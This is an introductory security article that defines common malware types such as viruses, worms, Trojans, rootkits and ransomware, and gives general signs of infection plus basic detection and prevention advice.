What is Malware?
Malware is a broad term that refers to a variety of malicious software designed to harm or exploit any programmable device or network. Types of malware can include viruses, worms, Trojan horses, root kits, ransomware, bots, adware, spyware etc. In this article, we will define several of the most common malware types.
A malware is rarely only one of the types described below, but rather a combination of them. However, it is important to understand and differentiate malware types in order to detect and defend against them.
A virus is the most commonly known malware type that is capable of infecting other files and spreading to other computers. They spread to other computers by attaching themselves to other programs when a user launches an infected program. In this sense, they do not spread on their own and require an unsuspecting user to execute them for the initiation of the malicious behavior.
A worm is very much like a virus but it can self-replicate without a host program and spreads without any human interaction. Viruses, by contrast, require a user to kick them off. In this sense, a worm is considered to be a standalone piece of malware. This unique feature of malware to spread without user interaction is what makes them so devastating.
Worms typically exploit the vulnerabilities on programs, especially on operating systems, to spread on their own on the networks. For instance, the SQL Slammer worm exploited a buffer overflow vulnerability on Microsoft SQL servers to infect all the unpatched MS SQL servers in the Internet in about 10 minutes.
Trojan horses (or Trojan) disguise themselves as desirable code or normal file or program to trick users into downloading and installing them. Once installed by unsuspecting users, they take control of victims’ system and give a malicious party remote access into the infected computers.
Trojans usually introduced into systems via email attachments, cracked apps or software patches. One popular attack type is displaying a pop up that claims the victim’s computer is infected, so that the unsuspecting user can be tricked into installing the malware that masquerade as an antivirus program.
Trojans are one of the most common malware and hard to defend against. This is due to the fact that they are easy to write and generated in massive quantities and varieties. Secondly, they spread by tricking users, which eliminates many traditional or technical control measures to prevent them.
A root kit is a type of malware that gives attackers remote control of a victim’s computer with full administrative privileges. They are usually injected into the operating system kernels, hypervisors or firmware in order to gain privileged access on the system. Mostly, they spread through malicious downloads, phishing or malicious attachments.
As being one of the most prevalent types of malware, a ransomware is a malicious software that uses encryption to disable a victim’s access to its own data and demands a ransom, usually in a cryptocurrency in return to decrypt the encrypted data.
Ransomware can be prevented just like any type of malware. However, once it infects a system, usually an offline backup is the only solution (except for paying the ransom) to recover a system. This is because they use well known and hard to break encryption schemes to render the data inaccessible to the victim. In rare cases, it could be possible possible to find implementation faults in the malware through reverse engineering to recover the encrypted data back.
A bot is a legitimate application that performs automated tasks on command on a system. But, they could also be used for malicious purposes, usually as apart of a group of bots focused on the same task administered by an attacker. This group of bots is also known as botnets, and they are often rented out to other criminals for their own nefarious purposes. In general, botnets are used to launch remotely controlled floods of attacks, such as DDoS (Distributed Denial of Service) attacks.
Adware is type of malware that delivers automatically unwanted advertisements, that are potentially malicious. Another fact about them is they usually come bundled with spyware or as part of an another malware, such as a Trojan.
Spyware is a type of malware that collect information about users on infected computers without the victims’ knowledge or consent. Attackers usually spy on information such as passwords or pins (usually through key loggers), credit card information, intellectual property or other personal information.
Another related and hype term that needs to be discussed in the context of malware is fileless malware. Rather than being a category of malware, the term actually describes an unorthodox exploitation and perseverance method for malware.
Traditionally, malware infects and spread trough the file system. Fileless malware, instead exploit and spread in memory only to prevent detection by anti-malware or other security mechanisms. To be more clear, they exploit initially non-file OS objects such as registry keys or APIs and persist only in the memory to leave few traces as possible on the infected system. However, they could be leveraged later to install other malware types such as Trojans in the target system.
Some of the apparent signs that you should suspect malware is present on your system are as follows:
- Increased CPU usage.
- Lagging in computer or web browser speeds.
- Network connection problems or unusual increase in network traffic.
- Unusual changes in the system, such as modified, deleted files or appearance of strange files or desktop icons.
- Strange computer behavior, such as freezing or crashing applications.
- Configuration changes or turning off your antivirus or firewall programs.
- Emails or social media messages sent automatically without your knowledge.
How to Detect Malware?
Detecting the existence of malware on a system could be tricky and requires employing an array of techniques, such as artificial intelligence based anomaly detection, host computer integrity checks, host/network traffic analysis and even manually conducted reverse engineering analysis to discover them.
This is due to the fact that modern malware are designed to fool users and security professionals through a variety of evasion and obfuscation techniques. For instance, using existing proxy servers, they can hide their network traffic. In more sophisticated cases, they could repeatedly change their underlying code (polymorphic malware) to prevent signature based detection mechanisms. To give another example, they can avoid detection through reverse engineering analysis, using anti-sandbox techniques where the execution of the malware is delayed until after leaving the sandbox.
The problem of viruses is temporary and will be solved in two years.John McAfee
Read more educational and inspirational cyber quotes at our page 100+ Best Cyber Security & Hacker Quotes.
How to Prevent Malware?
The best method against fighting malware is to prevent them at the first place. In this sense, the following best practices should be followed to prevent malware infections.
- Train your users to prevent phishing attacks or infections through malicious websites.
- Be vigilant when downloading files, programs or attachments.
- Keep your operating system and software up to date with current patches.
- Install and run anti-malware software.
To learn more about malware, you could also read our article What Is Fileless Malware?